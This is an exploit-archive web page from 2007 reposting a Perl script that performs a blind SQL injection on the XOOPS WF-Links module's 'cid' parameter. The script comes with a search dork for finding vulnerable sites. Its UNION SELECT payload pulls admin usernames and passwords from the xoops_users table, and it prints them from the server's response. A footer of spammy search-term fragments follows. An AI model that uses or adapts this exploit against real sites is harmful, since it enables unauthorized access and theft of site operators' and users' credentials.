about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit




2007-04-06 XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit 
Rated as : High Risk

#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Links <= 1.03 (cid) Remote BLIND SQL
Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[Dork       : inurl:/modules/wflinks  (63.900 Result)
#[Down&Info  :
http://www.xoops.org/modules/repository/singlefile.php?cid=40&lid=1511
#[$$         : Free
#[..         : ajann,Turkey


use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//  XOOPS Module WF-Links <= 1.03 (cid) Remote BLIND SQL Injection
Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$kapan = "/*";
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/modules/wflinks/viewcat.php?cid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }

print "User ID (uid): ";
$id = <STDIN>;
chop ($id);

$target =
"-1%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<\/a>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }
securitydot.net - 2007-04-06

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 15:25:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wap.vedio www.sublim stoffwechs VBulletin Www.indian WW.Pink wo girlssexfi mwchat/lib www.sex mo www.3gmidi maxcpm.inf moodle s...4.52.2 Rany sex Rany sex Rany sex game WWW.SEX SE Without cl lo69l php advanc t228t vedo sexi maxcpm.inf www.worald VENTRILO Kerio Pers news for c licken.net porno grat Free vidio Www.japan mp3 200 /compo www.sextvi www.fashio maxcpm.inf nuked-klan nudegirlse japansex efsha.co.u maxcpm.inf t95t sex 98.mov jinrisf.co CMS is Fre www.jinris www.free-z 200+%252Fc mambo+Remo